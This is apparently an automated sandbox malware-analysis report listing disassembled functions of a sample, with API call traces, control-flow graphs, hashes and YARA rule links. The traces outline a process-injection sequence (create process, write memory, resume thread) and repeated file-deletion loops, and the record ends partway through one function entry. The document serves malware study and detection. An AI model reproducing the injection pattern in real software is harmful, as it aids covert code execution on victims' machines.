                                                                                                                                                                                          Function 02380005 Relevance: 2.6, APIs: 1, Instructions: 1116COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 0238098B: OpenMutexA.KERNEL32(001F0001,00000000,00000000), ref: 023809A5
                                                                                                                                                                                            • Part of subcall function 0238098B: GetStartupInfoA.KERNEL32(00000000), ref: 023809BD
                                                                                                                                                                                          • ExitProcess.KERNEL32(00000000), ref: 0238001D
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000C.00000002.1812618047.0000000002380000.00000040.00001000.00020000.00000000.sdmp, Offset: 02380000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_2380000_bin.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ExitInfoMutexOpenProcessStartup
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 213680645-0
                                                                                                                                                                                          • Opcode ID: 8ded0c1563596ef065c873257d9f166c149bbeaf12971adc1d4101d8be03d7fe
                                                                                                                                                                                          • Instruction ID: a287faa4fa95e8a3f5c84f8dc856e66b27c84a1475dcc4910eb629901050568f
                                                                                                                                                                                          • Opcode Fuzzy Hash: 8ded0c1563596ef065c873257d9f166c149bbeaf12971adc1d4101d8be03d7fe
                                                                                                                                                                                          • Instruction Fuzzy Hash: 0C7202A145E3C05FD72FBB604A65A657FB9AF03208B1A10CBD4C1DF0B3D6649A0DC76A
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00850000 Relevance: 21.4, APIs: 3, Strings: 9, Instructions: 395memoryCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000C.00000002.1812098720.0000000000850000.00000040.00001000.00020000.00000000.sdmp, Offset: 00850000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_850000_bin.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ProtectVirtual
                                                                                                                                                                                          • String ID: $1;$@$C[$R$d:$wJ$y7$v
                                                                                                                                                                                          • API String ID: 544645111-3459585926
                                                                                                                                                                                          • Opcode ID: 53f4e89c0dc9a16f3c8cd647b3aa6a18b2ce076b07f4b3090f74fc473a9225f3
                                                                                                                                                                                          • Instruction ID: a83a67dc5248ec11a752d4e3d9235a2fc5cf258d1871ba1ffd0080b1d3c1f827
                                                                                                                                                                                          • Opcode Fuzzy Hash: 53f4e89c0dc9a16f3c8cd647b3aa6a18b2ce076b07f4b3090f74fc473a9225f3
                                                                                                                                                                                          • Instruction Fuzzy Hash: 363277B8E012688BDB64CF68C890BDDBBB1BF49304F1481DAD848A7341D775AE85CF95
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 001C093E Relevance: 18.1, APIs: 12, Instructions: 134sleepthreadCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • Sleep.KERNEL32(00001388), ref: 001C0959
                                                                                                                                                                                          • RtlExitUserThread.NTDLL(00000000), ref: 001C0961
                                                                                                                                                                                          • OpenMutexA.KERNEL32(001F0001,00000000,00000000), ref: 001C0981
                                                                                                                                                                                          • GetStartupInfoA.KERNEL32(00000000), ref: 001C0999
                                                                                                                                                                                            • Part of subcall function 001C09D9: CreateProcessA.KERNEL32(00000000,001C09D2,00000007,E8FFFF1F,E8FFFBFB,00000000,00000000,00000000,00000004,00000000,00000000,E8FFFC3F,00000000), ref: 001C09E0
                                                                                                                                                                                            • Part of subcall function 001C09D9: GetThreadContext.KERNEL32(?,00000000), ref: 001C0A08
                                                                                                                                                                                            • Part of subcall function 001C09D9: VirtualProtectEx.KERNEL32(?,?,000000EB,00000040,00000000), ref: 001C0A33
                                                                                                                                                                                            • Part of subcall function 001C09D9: DuplicateHandle.KERNEL32(000000FF,000000FF,?,001C5810,00000000,00000000,00000002), ref: 001C0A78
                                                                                                                                                                                            • Part of subcall function 001C09D9: WriteProcessMemory.KERNEL32(?,?,?,000000EB,00000000), ref: 001C0AA6
                                                                                                                                                                                            • Part of subcall function 001C09D9: ResumeThread.KERNEL32(?), ref: 001C0AB6
                                                                                                                                                                                            • Part of subcall function 001C09D9: Sleep.KERNEL32(000003E8), ref: 001C0AC6
                                                                                                                                                                                            • Part of subcall function 001C09D9: OpenMutexA.KERNEL32(001F0001,00000000,00000000), ref: 001C0ADD
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000C.00000002.1811183603.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_1c0000_bin.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Thread$MutexOpenProcessSleep$ContextCreateDuplicateExitHandleInfoMemoryProtectResumeStartupUserVirtualWrite
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1099281029-0
                                                                                                                                                                                          • Opcode ID: 0e1f2a4e7413688aa54805ed2a14ac9b83cd4127bce701e40c3c8803db53eeff
                                                                                                                                                                                          • Instruction ID: 02247e30dbf509db19e564959b2d0d53da4b464b58ceeb9d9e50b48634e6cc8b
                                                                                                                                                                                          • Opcode Fuzzy Hash: 0e1f2a4e7413688aa54805ed2a14ac9b83cd4127bce701e40c3c8803db53eeff
                                                                                                                                                                                          • Instruction Fuzzy Hash: E7517031644354AFEF239F20CC85F9A77B8AF14B44F040199BA49FE0D6DBB0DA94CA65
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 001C3F0D Relevance: 6.0, APIs: 4, Instructions: 26sleepCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000,00000000,?,001C3F03,0000000A,E8FFFF1B,00000000,0000000A), ref: 001C3F2D
                                                                                                                                                                                          • Sleep.KERNELBASE(000003E8,00000000,?,001C3F03,0000000A,E8FFFF1B,00000000,0000000A), ref: 001C3F4B
                                                                                                                                                                                          • Sleep.KERNEL32(000007D0), ref: 001C3F5B
                                                                                                                                                                                          • Sleep.KERNEL32(00000BB8), ref: 001C3F6B
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000C.00000002.1811183603.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_1c0000_bin.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Sleep$HandleModule
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3646095425-0
                                                                                                                                                                                          • Opcode ID: 550d547703b1faf33bdbb28134adf901e3b34dfa1c128e3e0b52710aeb13400a
                                                                                                                                                                                          • Instruction ID: 634a74a46434a642e0226302b98b7da89e65e1ed753664d014aab6768df5a327
                                                                                                                                                                                          • Opcode Fuzzy Hash: 550d547703b1faf33bdbb28134adf901e3b34dfa1c128e3e0b52710aeb13400a
                                                                                                                                                                                          • Instruction Fuzzy Hash: EFF05E60988244A6EF413BB0884AF4D36B45F31705F04889CBA59E90D2CF30C6508E72
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 001C1345 Relevance: 4.6, APIs: 3, Instructions: 61memoryCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 53 1c1345-1c1352 54 1c1358-1c135e 53->54 55 1c13eb-1c13ec 53->55 54->55 56 1c1364-1c137a VirtualProtect 54->56 56->55 57 1c137c-1c138f VirtualAlloc 56->57 57->57 58 1c1391-1c1398 57->58 59 1c139b-1c13ab call 1c0e7c 58->59 62 1c13ad-1c13e5 VirtualProtect 59->62 62->55
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • VirtualProtect.KERNELBASE(?,00000020,00000040,?), ref: 001C1372
                                                                                                                                                                                          • VirtualAlloc.KERNELBASE(00000000,00000020,00003000,00000040), ref: 001C1387
                                                                                                                                                                                          • VirtualProtect.KERNELBASE(?,00000020,?,?), ref: 001C13E5
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000C.00000002.1811183603.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_1c0000_bin.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Virtual$Protect$Alloc
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2541858876-0
                                                                                                                                                                                          • Opcode ID: e6710b313372bdb89baaa3f3abf609e97fcf4defd94341f28ea73213f73bc76a
                                                                                                                                                                                          • Instruction ID: 24bdabae7abb68ff9a17f5ee70b33f63d9b304115b88680595e81b57cc4b6d8c
                                                                                                                                                                                          • Opcode Fuzzy Hash: e6710b313372bdb89baaa3f3abf609e97fcf4defd94341f28ea73213f73bc76a
                                                                                                                                                                                          • Instruction Fuzzy Hash: C921AE31944256AFDB11DE78C844B5DBBB5AF05310F054219F955BB5D5D730E800CB94
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 02383409 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 511 2383409-2383462 GetVolumeInformationA call 2383634
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetVolumeInformationA.KERNELBASE(02383405,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000104), ref: 02383409
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000C.00000002.1812618047.0000000002380000.00000040.00001000.00020000.00000000.sdmp, Offset: 02380000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_2380000_bin.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: InformationVolume
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2039140958-0
                                                                                                                                                                                          • Opcode ID: 05df49bcbb0e52281ffeddc20694d7dcde29ca99da7d602d76b789caa7e7f337
                                                                                                                                                                                          • Instruction ID: ca6f0edebffd9bb2924a5450e1d8a21222bf92ee10a23942faead219f6babb9d
                                                                                                                                                                                          • Opcode Fuzzy Hash: 05df49bcbb0e52281ffeddc20694d7dcde29ca99da7d602d76b789caa7e7f337
                                                                                                                                                                                          • Instruction Fuzzy Hash: 13F0F875A00154DBEF12EF24C485A9A7BF8AF84344F4508C8AA4DBF206CA30A599CFA4
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Non-executed Functions

                                                                                                                                                                                          Function 02382951 Relevance: 13.7, APIs: 9, Instructions: 169filestringsleepCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • LoadLibraryA.KERNEL32(02382949,00000008,?,00000000,02382835,00000000), ref: 02382956
                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,01400000,00003000,00000004), ref: 02382993
                                                                                                                                                                                          • lstrcat.KERNEL32(00000000,023829C1), ref: 023829D0
                                                                                                                                                                                          • lstrcat.KERNEL32(00000000,023829F8), ref: 02382A07
                                                                                                                                                                                          • lstrcat.KERNEL32(00000000,02382A2F), ref: 02382A3E
                                                                                                                                                                                          • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 02382AB8
                                                                                                                                                                                          • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 02382AFC
                                                                                                                                                                                          • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000001,00000000,00000000,00A00000), ref: 02382B52
                                                                                                                                                                                          • Sleep.KERNEL32(000A012C,00000000,00000000,00000000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000), ref: 02382B66
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000C.00000002.1812618047.0000000002380000.00000040.00001000.00020000.00000000.sdmp, Offset: 02380000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_2380000_bin.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: DeleteFilelstrcat$AllocLibraryLoadSleepVirtual
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 675344582-0
                                                                                                                                                                                          • Opcode ID: d011dff3c69ba8b3f7cae5bbaa392318d89e88feb0221dd9666ec9f6df8cf3c0
                                                                                                                                                                                          • Instruction ID: 3f42b6f8231ee44447f82dbdfb2a56677ce5942c08541a50f89f840f7a315c1a
                                                                                                                                                                                          • Opcode Fuzzy Hash: d011dff3c69ba8b3f7cae5bbaa392318d89e88feb0221dd9666ec9f6df8cf3c0
                                                                                                                                                                                          • Instruction Fuzzy Hash: 5C515171501394AEEB237F708D48FAB77BDEF40705F4404A6AE85EE051EE349680CEA5
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 001C292D Relevance: 13.7, APIs: 9, Instructions: 169filestringsleepCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 554 1c292d-1c2943 call 1c3653 LoadLibraryA call 1c0c9c 558 1c2948-1c295f 554->558 560 1c2961-1c2977 VirtualAlloc 558->560 560->560 561 1c2979-1c299f call 1c25e8 call 1c29a6 560->561 566 1c2a07-1c2a1a call 1c3653 lstrcat 561->566 567 1c29a1-1c2a06 call 1c3653 lstrcat call 1c25e8 call 1c29dd call 1c3653 lstrcat call 1c2501 call 1c2a14 561->567 574 1c2a20-1c2a43 call 1c2b4d call 1c34f7 566->574 567->566 582 1c2a48-1c2a4f 574->582 582->574 584 1c2a51-1c2a6d call 1c343f call 1c2683 582->584 594 1c2a6f 584->594 595 1c2a9a-1c2ab1 call 1c2683 584->595 594->595 597 1c2a71-1c2a86 call 1c26f9 594->597 600 1c2ade-1c2af5 call 1c2683 595->600 601 1c2ab3 595->601 597->595 605 1c2a88 597->605 610 1c2af8-1c2b11 call 1c2e97 600->610 611 1c2af7 600->611 601->600 603 1c2ab5-1c2aca call 1c26f9 601->603 603->600 612 1c2acc 603->612 605->595 606 1c2a8a-1c2a94 DeleteFileA 605->606 606->595 616 1c2b34-1c2b48 Sleep 610->616 617 1c2b13-1c2b1c call 1c3057 610->617 611->610 612->600 615 1c2ace-1c2ad8 DeleteFileA 612->615 615->600 616->582 617->616 620 1c2b1e-1c2b2e DeleteFileA 617->620 620->616
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • LoadLibraryA.KERNEL32(001C2925,00000008,?,00000000,001C2811,00000000), ref: 001C2932
                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,01400000,00003000,00000004), ref: 001C296F
                                                                                                                                                                                          • lstrcat.KERNEL32(00000000,001C299D), ref: 001C29AC
                                                                                                                                                                                          • lstrcat.KERNEL32(00000000,001C29D4), ref: 001C29E3
                                                                                                                                                                                          • lstrcat.KERNEL32(00000000,001C2A0B), ref: 001C2A1A
                                                                                                                                                                                          • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 001C2A94
                                                                                                                                                                                          • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 001C2AD8
                                                                                                                                                                                          • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000001,00000000,00000000,00A00000), ref: 001C2B2E
                                                                                                                                                                                          • Sleep.KERNEL32(000A012C,00000000,00000000,00000000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000), ref: 001C2B42
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000C.00000002.1811183603.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_1c0000_bin.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: DeleteFilelstrcat$AllocLibraryLoadSleepVirtual
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 675344582-0
                                                                                                                                                                                          • Opcode ID: d011dff3c69ba8b3f7cae5bbaa392318d89e88feb0221dd9666ec9f6df8cf3c0
                                                                                                                                                                                          • Instruction ID: 5e20f8d1fd77fe1a3bbaf27d3d0f84e3a94bc46b39ba8ee9e7a75b819cd3b3af
                                                                                                                                                                                          • Opcode Fuzzy Hash: d011dff3c69ba8b3f7cae5bbaa392318d89e88feb0221dd9666ec9f6df8cf3c0
                                                                                                                                                                                          • Instruction Fuzzy Hash: 55513471500264AFDB227B608D49FAB77BCEF60705F0444AEFA45EB056DB74DA80CEA1
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 023809FD Relevance: 12.1, APIs: 8, Instructions: 76threadsleepprocessCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 703 23809fd-2380a0c call 2383677 CreateProcessA 706 2380b10 703->706 707 2380a12-2380a34 GetThreadContext 703->707 709 2380b15-2380b16 706->709 710 2380b10 call 2380b17 706->710 707->706 708 2380a3a-2380a5f VirtualProtectEx 707->708 708->706 711 2380a65-2380aa4 DuplicateHandle 708->711 710->709 711->706 712 2380aa6-2380ad2 WriteProcessMemory 711->712 712->706 713 2380ad4-2380ae0 ResumeThread 712->713 714 2380ae5-2380b09 Sleep OpenMutexA 713->714 714->709 715 2380b0b-2380b0e 714->715 715->706 715->714
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • CreateProcessA.KERNEL32(00000000,023809F6,00000007,E8FFFF1F,E8FFFBFB,00000000,00000000,00000000,00000004,00000000,00000000,E8FFFC3F,00000000), ref: 02380A04
                                                                                                                                                                                          • GetThreadContext.KERNEL32(?,00000000), ref: 02380A2C
                                                                                                                                                                                          • VirtualProtectEx.KERNEL32(?,?,000000EB,00000040,00000000), ref: 02380A57
                                                                                                                                                                                          • DuplicateHandle.KERNEL32(000000FF,000000FF,?,02385834,00000000,00000000,00000002), ref: 02380A9C
                                                                                                                                                                                          • WriteProcessMemory.KERNEL32(?,?,?,000000EB,00000000), ref: 02380ACA
                                                                                                                                                                                          • ResumeThread.KERNEL32(?), ref: 02380ADA
                                                                                                                                                                                          • Sleep.KERNEL32(000003E8), ref: 02380AEA
                                                                                                                                                                                          • OpenMutexA.KERNEL32(001F0001,00000000,00000000), ref: 02380B01
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000C.00000002.1812618047.0000000002380000.00000040.00001000.00020000.00000000.sdmp, Offset: 02380000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_2380000_bin.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ProcessThread$ContextCreateDuplicateHandleMemoryMutexOpenProtectResumeSleepVirtualWrite
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 617592159-0
                                                                                                                                                                                          • Opcode ID: 88fb36c18dc3a4afc247ee75a285c7b14497f4c37b797fc9ee23da592209a9b9
                                                                                                                                                                                          • Instruction ID: 653c7ca59492c808b9af08f9304fd86b8880f0c1d8734a2a6221dbde066ea1a9
                                                                                                                                                                                          • Opcode Fuzzy Hash: 88fb36c18dc3a4afc247ee75a285c7b14497f4c37b797fc9ee23da592209a9b9
                                                                                                                                                                                          • Instruction Fuzzy Hash: 6A314F316402189FEF279F20CC85BA977B8BF04748F0805D4AA49FE1E5DBB0D694CE64
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 001C09D9 Relevance: 12.1, APIs: 8, Instructions: 76threadsleepprocessCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 689 1c09d9-1c09e8 call 1c3653 CreateProcessA 692 1c0aec call 1c0af3 689->692 693 1c09ee-1c0a10 GetThreadContext 689->693 697 1c0af1-1c0af2 692->697 693->692 694 1c0a16-1c0a3b VirtualProtectEx 693->694 694->692 696 1c0a3c-1c0a80 DuplicateHandle 694->696 696->692 699 1c0a82-1c0aae WriteProcessMemory 696->699 699->692 700 1c0ab0-1c0abc ResumeThread 699->700 701 1c0ac1-1c0ae5 Sleep OpenMutexA 700->701 701->697 702 1c0ae7-1c0aea 701->702 702->692 702->701
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • CreateProcessA.KERNEL32(00000000,001C09D2,00000007,E8FFFF1F,E8FFFBFB,00000000,00000000,00000000,00000004,00000000,00000000,E8FFFC3F,00000000), ref: 001C09E0
                                                                                                                                                                                          • GetThreadContext.KERNEL32(?,00000000), ref: 001C0A08
                                                                                                                                                                                          • VirtualProtectEx.KERNEL32(?,?,000000EB,00000040,00000000), ref: 001C0A33
                                                                                                                                                                                          • DuplicateHandle.KERNEL32(000000FF,000000FF,?,001C5810,00000000,00000000,00000002), ref: 001C0A78
                                                                                                                                                                                          • WriteProcessMemory.KERNEL32(?,?,?,000000EB,00000000), ref: 001C0AA6
                                                                                                                                                                                          • ResumeThread.KERNEL32(?), ref: 001C0AB6
                                                                                                                                                                                          • Sleep.KERNEL32(000003E8), ref: 001C0AC6
                                                                                                                                                                                          • OpenMutexA.KERNEL32(001F0001,00000000,00000000), ref: 001C0ADD
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000C.00000002.1811183603.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_1c0000_bin.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ProcessThread$ContextCreateDuplicateHandleMemoryMutexOpenProtectResumeSleepVirtualWrite
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 617592159-0
                                                                                                                                                                                          • Opcode ID: 88fb36c18dc3a4afc247ee75a285c7b14497f4c37b797fc9ee23da592209a9b9
                                                                                                                                                                                          • Instruction ID: d08d0b8b2051c34f5721e4dda066ff8a6639c36971b334a2f4be7756b07d5326
                                                                                                                                                                                          • Opcode Fuzzy Hash: 88fb36c18dc3a4afc247ee75a285c7b14497f4c37b797fc9ee23da592209a9b9
                                                                                                                                                                                          • Instruction Fuzzy Hash: F0312F31640215AFEF239F14CC85FAA77B8AF14744F080199AA49FE0E5DBB0DA90CE54
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 023829CA Relevance: 10.6, APIs: 7, Instructions: 130sleepfilestringCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • lstrcat.KERNEL32(00000000,023829C1), ref: 023829D0
                                                                                                                                                                                            • Part of subcall function 02382A01: lstrcat.KERNEL32(00000000,023829F8), ref: 02382A07
                                                                                                                                                                                            • Part of subcall function 02382A01: lstrcat.KERNEL32(00000000,02382A2F), ref: 02382A3E
                                                                                                                                                                                            • Part of subcall function 02382A01: DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 02382AB8
                                                                                                                                                                                            • Part of subcall function 02382A01: DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 02382AFC
                                                                                                                                                                                          • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000001,00000000,00000000,00A00000), ref: 02382B52
                                                                                                                                                                                          • Sleep.KERNEL32(000A012C,00000000,00000000,00000000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000), ref: 02382B66
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000C.00000002.1812618047.0000000002380000.00000040.00001000.00020000.00000000.sdmp, Offset: 02380000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_2380000_bin.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: DeleteFilelstrcat$Sleep
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 588723932-0
                                                                                                                                                                                          • Opcode ID: cf8439a9f46fc1c5678143b13b51c65cbdf78dca36166c9e79c3ab7667b2c553
                                                                                                                                                                                          • Instruction ID: f476d220d687aba7819765499cc8778cfc7e8b440bce6d49efd8cbf0e8579e85
                                                                                                                                                                                          • Opcode Fuzzy Hash: cf8439a9f46fc1c5678143b13b51c65cbdf78dca36166c9e79c3ab7667b2c553
                                                                                                                                                                                          • Instruction Fuzzy Hash: 23413271501398AEDB33BB708D48EAF77BDEF40704F4045A6AE85EE051EE349680CEA1
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 001C29A6 Relevance: 10.6, APIs: 7, Instructions: 130sleepfilestringCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 716 1c29a6-1c2a1a call 1c3653 lstrcat call 1c25e8 call 1c29dd call 1c3653 lstrcat call 1c2501 call 1c2a14 call 1c3653 lstrcat 733 1c2a20-1c2a43 call 1c2b4d call 1c34f7 716->733 737 1c2a48-1c2a4f 733->737 737->733 738 1c2a51-1c2a6d call 1c343f call 1c2683 737->738 743 1c2a6f 738->743 744 1c2a9a-1c2ab1 call 1c2683 738->744 743->744 746 1c2a71-1c2a86 call 1c26f9 743->746 749 1c2ade-1c2af5 call 1c2683 744->749 750 1c2ab3 744->750 746->744 754 1c2a88 746->754 759 1c2af8-1c2b11 call 1c2e97 749->759 760 1c2af7 749->760 750->749 752 1c2ab5-1c2aca call 1c26f9 750->752 752->749 761 1c2acc 752->761 754->744 755 1c2a8a-1c2a94 DeleteFileA 754->755 755->744 765 1c2b34-1c2b48 Sleep 759->765 766 1c2b13-1c2b1c call 1c3057 759->766 760->759 761->749 764 1c2ace-1c2ad8 DeleteFileA 761->764 764->749 765->737 766->765 769 1c2b1e-1c2b2e DeleteFileA 766->769 769->765
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • lstrcat.KERNEL32(00000000,001C299D), ref: 001C29AC
                                                                                                                                                                                            • Part of subcall function 001C29DD: lstrcat.KERNEL32(00000000,001C29D4), ref: 001C29E3
                                                                                                                                                                                            • Part of subcall function 001C29DD: lstrcat.KERNEL32(00000000,001C2A0B), ref: 001C2A1A
                                                                                                                                                                                            • Part of subcall function 001C29DD: DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 001C2A94
                                                                                                                                                                                            • Part of subcall function 001C29DD: DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 001C2AD8
                                                                                                                                                                                          • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000001,00000000,00000000,00A00000), ref: 001C2B2E
                                                                                                                                                                                          • Sleep.KERNEL32(000A012C,00000000,00000000,00000000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000), ref: 001C2B42
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000C.00000002.1811183603.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_1c0000_bin.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: DeleteFilelstrcat$Sleep
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 588723932-0
